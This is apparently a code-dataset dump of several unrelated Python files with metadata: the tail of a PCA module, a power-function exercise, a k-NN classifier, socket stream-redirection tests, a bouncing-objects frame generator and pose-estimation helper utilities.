recon, recov\n \n TODO: Check if errors are really right. They don't depend upon\n the values of the coefficients, which doesn't seem right,\n unless the covariance of the coefficients already effectively\n contains that info.\n \"\"\"\n\n #- check data[nvar] vs. 
data[nobs, nvar]\n #- recursively call with (1 x nvar) arrays; cast back to 1D\n if len(coeffs.shape) == 1:\n coeffs = N.ma.atleast_2d(coeffs)\n if cov is None:\n recon = self.reconstruct(coeffs)\n return recon[0]\n else:\n cov = N.ma.array( (cov,) )\n recon, recov = self.reconstruct(coeffs, cov)\n return recon[0], recov[0]\n\n nobs, nvec = coeffs.shape\n recon = list()\n for i, c in enumerate(coeffs):\n ### print 'reconstruct', i\n if all( c == c ) :\n recon.append(self.mean + N.dot(self.eigenvectors[0:nvec].T, c))\n else :\n recon.append(N.nan * N.ones_like(self.mean))\n \n recon = N.array(recon)\n \n recov = list()\n if cov is not None:\n ### print 'Calculating reconstruction covariance'\n A = self.eigenvectors[0:nvec]\n for c, V in zip(coeffs, cov):\n U = N.dot(A.T, N.dot(V, A) )\n recov.append(U)\n recov = N.array(recov)\n \n return recon, recov\n else:\n return recon\n \n\n", "sub_path": "src/xpca/pca.py", "file_name": "pca.py", "file_ext": "py", "file_size_in_byte": 5440, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "numpy.dot", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.ma.ones", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 69, "usage_type": "attribute"}, {"api_name": "numpy.ma.array", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 71, "usage_type": "attribute"}, {"api_name": "numpy.ma.atleast_2d", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 76, "usage_type": "attribute"}, {"api_name": "numpy.ma.atleast_2d", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 77, "usage_type": "attribute"}, {"api_name": "numpy.ma.array", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 82, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 86, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 89, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 90, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 92, "usage_type": "call"}, {"api_name": "scipy.optimize.leastsq", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.ma.atleast_2d", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 133, "usage_type": "attribute"}, {"api_name": "numpy.ma.array", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 138, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 149, "usage_type": "attribute"}, {"api_name": "numpy.ones_like", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 160, "usage_type": "call"}]}
+{"seq_id": "33214013", "text": "\"\"\"\n Написать функцию, которая возводит число a в степень b.\n\"\"\"\nfrom utils import get_int\n\n\ndef main():\n print(\"Enter x:\", end=\" \")\n x = get_int()\n print(\"Enter y:\", end=\" \")\n y = get_int()\n\n result = pow_(x, y)\n print(f\"{x} ^ {y} = {result}\")\n\n\ndef pow_(x: int, y: int) -> int:\n return x ** y\n\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "Lesson_05/_6_practice_pow.py", "file_name": "_6_practice_pow.py", "file_ext": "py", "file_size_in_byte": 402, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "utils.get_int", "line_number": 9, "usage_type": "call"}, {"api_name": "utils.get_int", "line_number": 11, "usage_type": "call"}]}
+{"seq_id": "44026576", "text": "# -*- coding: utf-8 -*-\n\n\"\"\"\nCopyright () 2018\nAll rights reserved\n\nFILE: alg_knn.py\nDATE CREATED: @Time : 2018/2/25 10:25\n\nDESCRIPTION: k-近邻算法\n1. 该算法是用来进行分类的算法\n2. 通过计算要进行分类的数据与已知类别的数据之间的距离,确定出k个近邻的数据,然后判断这k个近邻数的类别,选择出现次数最多的类别作为要进行\n 分类的数据的类别\n3. 常用的来计算要进行分类的数据与已知类别数据之间距离的方法:\n (1)\n (2)\n4.\n\nVERSION: : #1 \nCHANGE: :\nMODIFIED: : @Time : 2018/2/25 10:25\n\"\"\"\nimport numpy as np\nimport operator # 运算符模块\n\n\ndef create_dataset():\n \"\"\"\n 创建数据集合和标签\n :return:\n \"\"\"\n group = np.array([[1.0, 1.1], [1.0, 1.0], [0, 0], [0, 0.1]])\n labels = ['A', 'A', 'B', 'B']\n return group, labels\n\n\ndef classify0(in_data, dataset, labels, k):\n \"\"\"\n k-NN算法实现:\n (1)计算已知类别数据集中的点与当前点的距离\n (2)按照距离递增排序\n (3)选取距离最小的k个点\n (4)确定k个点所在类别出现的概率\n (5)返回k个点出现频率最高的类别\n return: 返���in_data所属类别\n \"\"\"\n # 计算已知类别数据集中的点与当前点的距离, 采用欧式距离, 两点间的距离公式:((x0 - x1)**2 + (y0 - y1)**2)**0.5\n dataset_size = dataset.shape[0]\n diff_mat = np.tile(in_data, (dataset_size, 1)) - dataset\n sq_diff_mat = diff_mat ** 2\n sq_distance = sq_diff_mat.sum(axis=1)\n distances = sq_distance ** 0.5 # 得到已知类别中的每一个点和当前点的距离: [ 0.28284271 0.36055513 1.7691806 1.69705627]\n sorted_distaces_indices = distances.argsort() # 得到距离的排序:[0 1 3 2]\n # 选取与当前距离最小的k个点\n class_count = {}\n for i in range(k):\n vote_label = labels[sorted_distaces_indices[i]]\n class_count[vote_label] = class_count.get(vote_label, 0) + 1\n # 排序\n sorted_class_count = sorted(class_count.items(), key=operator.itemgetter(1), reverse=True)\n\n return sorted_class_count[0][0]\n\n\ndef classify1(in_data, data_set, label, k):\n \"\"\"\n 计算空间两个点之间的余弦距离\n \"\"\"\n n = data_set.shape[0]\n new_in_data = np.tile(in_data, (n, 1))\n a = data_set * new_in_data\n enominator_num = a.sum(axis=1)\n denominator_num = (new_in_data * new_in_data).sum(axis=1) * (data_set * data_set).sum(axis=1)\n value = enominator_num / denominator_num\n # 排序距离\n print(value)\n\n\ndef file2matrix(filename):\n \"\"\"\n 约会数据处理,将数据处理成矩阵\n \"\"\"\n with open(filename, 'r') as f:\n lines = f.readlines()\n length = len(lines)\n data_matrix = np.zeros((length, 3))\n data_labels = []\n index = 0\n for line in lines:\n list_from_line = line.strip().split()\n data_matrix[index, :] = list_from_line[0:3] # ndarry的索引:index表示第几行,第二个参数为对index进行索引\n data_labels.append(int(list_from_line[-1]))\n index += 1\n return data_matrix, data_labels\n\n\ndef analyse_data_by_plot(datas, label):\n \"\"\"\n 使用散点图进行数据分析\n \"\"\"\n import matplotlib.pyplot as plt\n fig = plt.figure() # 创建一个新的fingure\n ax = fig.add_subplot(111)\n ax.scatter(datas[:, 1], datas[:, 2], 15.0 * np.array(label), 15.0 * np.array(label))\n plt.xlabel('time play game')\n plt.ylabel('ice cream consume')\n plt.show()\n\n\ndef auto_norm(datas):\n \"\"\"\n 对数据进行归一化处理\n newvalue = (oldvalue - min) / (max - min)\n \"\"\"\n min_values = datas.min(0) # 获取datas中的每一列中的最小值, 返回该一维数组\n max_values = datas.max(0) # 获取datas中的每一列中的最大值,返回该一维数组\n ranges = max_values - min_values\n norm_datas = np.zeros(np.shape(datas))\n m = datas.shape[0] # 获取datas的shape,等价于np.shape(datas), m = 1000\n norm_datas = datas - np.tile(min_values, (m, 1)) # tile用来创建一个新的ndarray,重复min_value m次,每行数据重复1次\n norm_datas = norm_datas / np.tile(ranges, (m, 1))\n\n return norm_datas, ranges, min_values\n\n\ndef dating_class_test():\n \"\"\"\n 测试分类器的效果,得到分类器的错误率\n \"\"\"\n error_rate = 0.1\n dating_data, dating_labels = file2matrix(\n '/Users/jiale/workplace/practice/machine_learning/machinelearninginaction/Ch02/datingTestSet2.txt')\n norm_mat, ranges, min_value = 
auto_norm(dating_data)\n m = norm_mat.shape[0]\n num_test_vec = int(m * error_rate)\n error_count = 0\n for i in range(num_test_vec):\n classifier_result = classify0(norm_mat[i, :], norm_mat[num_test_vec:m, :], dating_labels[num_test_vec:m], 4)\n print('the classifier came back with {RESULT}, the real answer is {LABELS}'.format(RESULT=classifier_result,\n LABELS=dating_labels[i]))\n if classifier_result != dating_labels[i]:\n error_count += 1\n error_rate = error_count / float(num_test_vec)\n print('the total error rate is {RATE}'.format(RATE=error_rate))\n\n\nif __name__ == \"__main__\":\n group, labels = create_dataset()\n # 待分类数据\n in_data = np.array([1.2, 1.3])\n # 获取in_data的类别\n # classify1(in_data, group, labels, 2)\n # 使用k近邻算法进行约会网站配对效果改进\n import os\n\n current_folder = os.path.dirname(__file__) # 获取当前文件的目录\n folder = os.path.join(current_folder, '../../machine_learning/machinelearninginaction/Ch02/datingTestSet2.txt')\n real_path = os.path.abspath(folder)\n a = os.path.exists(real_path)\n data, labels = file2matrix(real_path)\n # analyse_data_by_plot(data, labels)\n # 进行数据的归一化\n norm_datas, ranges, min_values = auto_norm(data)\n # 测试分类器效果, 检测分类器的错误率\n dating_class_test()\n", "sub_path": "practice_alg/alg_knn.py", "file_name": "alg_knn.py", "file_ext": "py", "file_size_in_byte": 6082, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "numpy.array", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 49, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 150, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 156, "usage_type": "call"}, {"api_name": "os.path", "line_number": 156, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path", "line_number": 157, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path", "line_number": 158, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}]}
+{"seq_id": "92554024", "text": "#!/usr/bin/env python\n#-*-coding:utf-8\n\nimport sys,os,multiprocessing\nfrom socket_stream_redirect import *\n\n#redirect client output\ndef server1():\n\tmypid = os.getpid()\t\n\tconn = initListenerSocket()\n\tfile = conn.makefile('r')\t\n\tfor i in range(3):\n\t\tdata = file.readline().rstrip()#read/recv client's prints\t\t\n\t\tprint('server %s got: %s' % (mypid,data))\ndef client1():\n\tmypid = os.getpid()\n\tredirectOut()#返回一个socket,带有“写”的功能。\n\tfor i in range(3):\n\t\tprint('[client %s: %s]' %(mypid,i))#print to socket\n\t\tsys.stdout.flush()\n#redirect client input\ndef server2():\n\tmypid = os.getpid()\n\tconn = initListenerSocket()\n\tfor i in range(3):\n\t\tdata = 'server %s :%s\\n' % (mypid,i)\n\t\tconn.send(data.encode())\ndef client2():\n\tmypid = os.getpid()\n\tredirectIn()\n\tfor i in range(3):\n\t\tdata = input()#input from socket.\n\t\tprint('client %s got: %s' % (mypid,data))\n\t\t\n#redirect client input +output, client is socket client\ndef server3():\n\tmypid = os.getpid()\n\tconn = initListenerSocket()\n\tfile = conn.makefile('r')\n\tfor i in range(3):\n\t\tdata = file.readline().rstrip()\n\t\tconn.send(('server %s got [%s]\\n' % (mypid,data)).encode())\n\t\t\ndef client3():\n\tmypid = os.getpid()\n\tredirectBothAsClient()\n\tfor i in range(3):\n\t\tprint('client %s:%s ' % (mypid,i))\n\t\tdata = input()\n\t\tsys.stderr.write('client %s got [%s]\\n' % (mypid,data))\n\t\n\ndef server4():\n#有问题\n\tmypid = os.getpid()\n\tsock = socket(AF_INET,SOCK_STREAM)\n\tprint(host,port)\n\tsock.connect((host,port))\n\tfile = sock.makefile('r')\n\tfor i in range(3):\n\t\tsock.send(('server %s: %s\\n' % (mypid,i)).encode())\n\t\tdata = file.readline().rstrip()\n\t\tprint('server %s got [%s]' % (mypid,data))\n\t\t\ndef client4():\n\tmypid = os.getpid()\n\tredirectBothAsClient()\n\tfor i in range(3):\n\t\tdata = input()\n\t\tprint('client %s got [%s]' % (mypid,data))\n\t\tsys.stdout.flush()\ndef server5():\n\tmypid = os.getpid()\n\tconn = initListenerSocket()\n\tfile = conn.makefile('r')\n\tfor i in range(3):\n\t\tmessages = 'server %s:%s\\n' %(mypid,i)\n\t\tconn.send(messages.encode())\n\t\tdata = file.readline().rstrip()\n\t\tprint('server %s got [%s]\\n' %(mypid,data))\n\ndef client5():\n\tmypid = os.getpid()\n\tredirectBothAsClient()\n\tfor i in range(3):\n\t\tdata = input()#recv\n\t\tmessages = 'client %s got:[%s]\\n' %(mypid,data)\n\t\tprint(messages)#send\t\t\n\t\tsys.stdout.flush()\n\t\t\nif __name__ =='__main__':\t\n\t#server1()\n\tmultiprocessing.Process(target = server5).start()\n\tclient5()\n", "sub_path": "web/server-sockets/test-socket_stream_redirect.py", "file_name": "test-socket_stream_redirect.py", "file_ext": "py", "file_size_in_byte": 2377, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "os.getpid", "line_number": 9, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 20, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.getpid", "line_number": 23, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 29, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 37, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 45, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 50, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 50, "usage_type": 
"attribute"}, {"api_name": "os.getpid", "line_number": 55, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 66, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 71, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 71, "usage_type": "attribute"}, {"api_name": "os.getpid", "line_number": 73, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 83, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 89, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 89, "usage_type": "attribute"}, {"api_name": "multiprocessing.Process", "line_number": 93, "usage_type": "call"}]}
+{"seq_id": "428800049", "text": "import argparse\nimport random\nimport sys\n\nimport numpy as np\n\nfrom bouncing_objects_generator.frame import Frame\nfrom bouncing_objects_generator.square import Square\n\n\nclass Cli:\n\n @classmethod\n def run(cls, frame_width: int, frame_height: int,\n object_width: int, object_height: int, objects_size: int,\n frames_per_window: int, window_size: int, npy_output: str):\n\n frame = Frame(width=frame_width, height=frame_height)\n for _ in range(objects_size):\n frame.register_object(\n Square(width=object_width, height=object_height,\n frame_width=frame.width, frame_height=frame.height,\n degree=random.choice(range(0, 360)),\n speed=random.choice(range(1, 20)))\n )\n\n all_windows = []\n window_shape = (frames_per_window, 1, frame_height, frame_width)\n for i in range(window_size):\n sys.stderr.write(f'{i + 1}/{window_size}\\r')\n sys.stderr.flush()\n\n window = None\n for _ in range(frames_per_window):\n image = np.asarray(frame.draw(), dtype=np.uint8).reshape(1, frame_height, frame_width)\n if window is None:\n window = image\n else:\n window = np.vstack((window, image))\n\n all_windows.append(window.reshape(window_shape[0], window_shape[1], window_shape[2], window_shape[3]))\n sys.stderr.write('\\n')\n np.save(npy_output, np.concatenate(all_windows, axis=1))\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--frame_width', type=int, default=128)\n parser.add_argument('--frame_height', type=int, default=128)\n parser.add_argument('--object_width', type=int, default=32)\n parser.add_argument('--object_height', type=int, default=32)\n parser.add_argument('--frames_per_window', type=int, default=20)\n parser.add_argument('--window_size', type=int, default=100)\n parser.add_argument('--objects_size', type=int, default=3)\n parser.add_argument('--npy_output', type=str, default='bouncing_objects.npy')\n args = parser.parse_args()\n Cli.run(**vars(args))\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "bouncing_objects_generator/cli.py", "file_name": "cli.py", "file_ext": "py", "file_size_in_byte": 2248, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "bouncing_objects_generator.frame.Frame", "line_number": 18, "usage_type": "call"}, {"api_name": "bouncing_objects_generator.square.Square", "line_number": 21, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 23, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 24, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 30, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 30, "usage_type": "attribute"}, {"api_name": "sys.stderr.flush", "line_number": 31, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 31, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 35, "usage_type": "attribute"}, {"api_name": "numpy.vstack", "line_number": 39, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 42, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 42, "usage_type": "attribute"}, {"api_name": "numpy.save", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 43, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 47, "usage_type": "call"}]}
+{"seq_id": "390248803", "text": "import torch\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nfrom torch import nn\n\n\ndef compute_OKS(gt, dt, bb, area):\n\n sigmas = np.array([.26, .25, .25, .35, .35, .79, .79, .72, .72, .62,.62, 1.07, 1.07, .87, .87, .89, .89])/10.0\n vars = (sigmas * 2)**2\n k = len(sigmas)\n g = np.array(gt)\n xg = g[0::3]; yg = g[1::3]; vg = g[2::3]\n k1 = np.count_nonzero(vg > 0)\n x0 = bb[0] - bb[2]; x1 = bb[0] + bb[2] * 2\n y0 = bb[1] - bb[3]; y1 = bb[1] + bb[3] * 2\n d = np.array(dt)\n xd = d[0::3]; yd = d[1::3]\n if k1>0:\n # measure the per-keypoint distance if keypoints visible\n dx = xd - xg\n dy = yd - yg\n else:\n # measure minimum distance to keypoints in (x0,y0) & (x1,y1)\n z = np.zeros((k))\n dx = np.max((z, x0-xd),axis=0)+np.max((z, xd-x1),axis=0)\n dy = np.max((z, y0-yd),axis=0)+np.max((z, yd-y1),axis=0)\n e = (dx**2 + dy**2) / vars / (area.item()+np.spacing(1)) / 2\n if k1 > 0:\n e=e[vg > 0]\n OKS = np.sum(np.exp(-e)) / e.shape[0]\n\n return OKS\n\n\ndef plot_masks_on_image(im, masks):\n\n n_masks = masks.shape[0]\n #im = torch.transpose(im, 1, 2)\n #im = torch.transpose(im, 0, 1)\n for j in range(n_masks):\n\n r = cv2.resize(masks[j].numpy(), (256, 256))\n im[0, :, :] = im[0, :, :] + torch.from_numpy(r)\n\n return im\n\ndef get_transform(param, crop_pos, output_size, scales):\n shift_to_upper_left = np.identity(3)\n shift_to_center = np.identity(3)\n\n a = scales[0] * param['scale'] * np.cos(param['rot'])\n b = scales[1] * param['scale'] * np.sin(param['rot'])\n\n t = np.identity(3)\n t[0][0] = a\n if param['flip']:\n t[0][0] = -a\n\n t[0][1] = -b\n t[1][0] = b\n t[1][1] = a\n\n shift_to_upper_left[0][2] = -crop_pos[0] + param['tx']\n shift_to_upper_left[1][2] = -crop_pos[1] + param['ty']\n shift_to_center[0][2] = output_size / 2\n shift_to_center[1][2] = output_size / 2\n t_form = np.matmul(t, shift_to_upper_left)\n t_form = np.matmul(shift_to_center, t_form)\n\n return t_form\n\n\ndef apply_augmentation_test(example, output_size=256):\n im = cv2.imread(example, 1)\n height, width = im.shape[:2]\n\n crop_pos = [width / 2, height / 2]\n max_d = max(height, width)\n scales = [output_size / float(max_d), output_size / float(max_d)]\n\n param = {'rot': 0,\n 'scale': 1,\n 'flip': 0,\n 'tx': 0,\n 'ty': 0}\n\n t_form = get_transform(param, crop_pos, output_size, scales)\n im_cv = cv2.warpAffine(im, t_form[0:2, :], (output_size, output_size))\n img = cv2.cvtColor(im_cv, cv2.COLOR_BGR2RGB)\n imf = cv2.flip(img, 1)\n\n img = torch.from_numpy(img).float()\n img = torch.transpose(img, 1, 2)\n img = torch.transpose(img, 0, 1)\n img /= 255\n\n imf = torch.from_numpy(imf).float()\n imf = torch.transpose(imf, 1, 2)\n imf = torch.transpose(imf, 0, 1)\n imf /= 255\n\n warp = torch.from_numpy(np.linalg.inv(t_form))\n\n return img, imf, warp\n\n\ndef get_preds(prs, scales, warp):\n\n pool = nn.MaxPool2d(3, 1, 1).cuda()\n o = pool(prs.cuda()).data.cpu()\n maxm = torch.eq(o, prs).float()\n prs = prs * maxm\n res = 64\n prso = prs.view(res * res)\n val_k, ind = prso.topk(30, dim=0)\n xs = ind % res\n ys = (ind / res).long()\n xst, yst, sc, scores = [], [], [], []\n N = len(val_k)\n for i in range(N):\n if val_k[i] >= 0.001:\n xst.append(xs[i].item() * 4)\n yst.append(ys[i].item() * 4)\n sc.append(np.exp(scales[0][ys[i]][xs[i]]) * warp[0][0])\n scores.append(val_k[i])\n points = np.ones((3, len(sc)))\n points[0, :], points[1, :] = xst, yst\n dets = np.matmul(warp, points)\n\n return dets, sc, scores\n\n\ndef apply_augmentation_test_td(path, example, 
output_size=256):\n\n im = cv2.imread(path, 1)\n crop_pos = example['center']\n #crop_pos = [example['bbox'][0] + example['bbox'][2]/2, example['bbox'][1] + example['bbox'][3]/2]\n #x1, x2 = example['unit']['GT_bbox'][0], example['unit']['GT_bbox'][2]\n #y1, y2 = example['unit']['GT_bbox'][1], example['unit']['GT_bbox'][3]\n #crop_pos = [(x1+x2)/2, (y1+y2)/2]\n #max_d = np.maximum(abs(x1-x2), abs(y1-y2))\n max_d = example['scale']\n #max_d = np.maximum(example['bbox'][2], example['bbox'][3])\n scales = [output_size / float(max_d), output_size / float(max_d)]\n\n param = {'rot': 0,\n 'scale': 1,\n 'flip': 0,\n 'tx': 0,\n 'ty': 0}\n\n t_form = get_transform(param, crop_pos, output_size, scales)\n im_cv = cv2.warpAffine(im, t_form[0:2, :], (output_size, output_size))\n img = cv2.cvtColor(im_cv, cv2.COLOR_BGR2RGB)\n imf = cv2.flip(img, 1)\n\n img = torch.from_numpy(img).float()\n img = torch.transpose(img, 1, 2)\n img = torch.transpose(img, 0, 1)\n img /= 255\n\n imf = torch.from_numpy(imf).float()\n imf = torch.transpose(imf, 1, 2)\n imf = torch.transpose(imf, 0, 1)\n imf /= 255\n\n warp = torch.from_numpy(np.linalg.inv(t_form))\n\n return img, imf, warp\n\n\ndef get_preds_td(prs, mat, sr):\n\n pool = nn.MaxPool2d(3, 1, 1).cuda()\n\n xoff = sr[0:17]\n yoff = sr[17:34]\n\n prs2 = prs\n\n o = pool(prs.cuda()).data.cpu()\n maxm = torch.eq(o, prs).float()\n prs = prs * maxm\n res = 64\n prso = prs.view(17, res * res)\n val_k, ind = prso.topk(1, dim=1)\n xs = ind % res\n ys = (ind / res).long()\n\n\n keypoints = []\n score = 0\n points = torch.zeros(17, 2)\n c = 0\n\n for j in range(17):\n\n x, y = xs[j][0], ys[j][0]\n dx = xoff[j][int(y)][int(x)]\n dy = yoff[j][int(y)][int(x)]\n points[j][0] = (x * 4) + dx.item()\n points[j][1] = (y * 4) + dy.item()\n\n score += val_k[j][0]\n c += 1\n\n score /= c\n\n for j in range(17):\n\n point = torch.ones(3, 1)\n #if points[j][0] > 0 and points[j][1] > 0:\n point[0][0] = points[j][0]\n point[1][0] = points[j][1]\n #else:\n # point[0][0] = xm\n # point[1][0] = ym\n\n keypoint = np.matmul(mat, point)\n keypoints.append(float(keypoint[0].item()))\n keypoints.append(float(keypoint[1].item()))\n #keypoints.append(int(point[0][0]))\n #keypoints.append(int(point[1][0]))\n keypoints.append(1)\n\n return keypoints, score.item()\n\n", "sub_path": "data_utils.py", "file_name": "data_utils.py", "file_ext": "py", "file_size_in_byte": 6322, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "numpy.array", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.count_nonzero", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.spacing", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.identity", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.identity", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 53, 
"usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.identity", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 70, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 76, "usage_type": "call"}, {"api_name": "cv2.warpAffine", "line_number": 90, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 91, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 91, "usage_type": "attribute"}, {"api_name": "cv2.flip", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 100, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 104, "usage_type": "attribute"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 111, "usage_type": "name"}, {"api_name": "torch.eq", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 130, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 137, "usage_type": "call"}, {"api_name": "cv2.warpAffine", "line_number": 155, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 156, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 156, "usage_type": "attribute"}, {"api_name": "cv2.flip", "line_number": 157, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 159, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 160, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 161, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 164, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 165, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 166, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 169, "usage_type": "attribute"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 176, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 176, "usage_type": "name"}, {"api_name": "torch.eq", "line_number": 184, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 213, "usage_type": 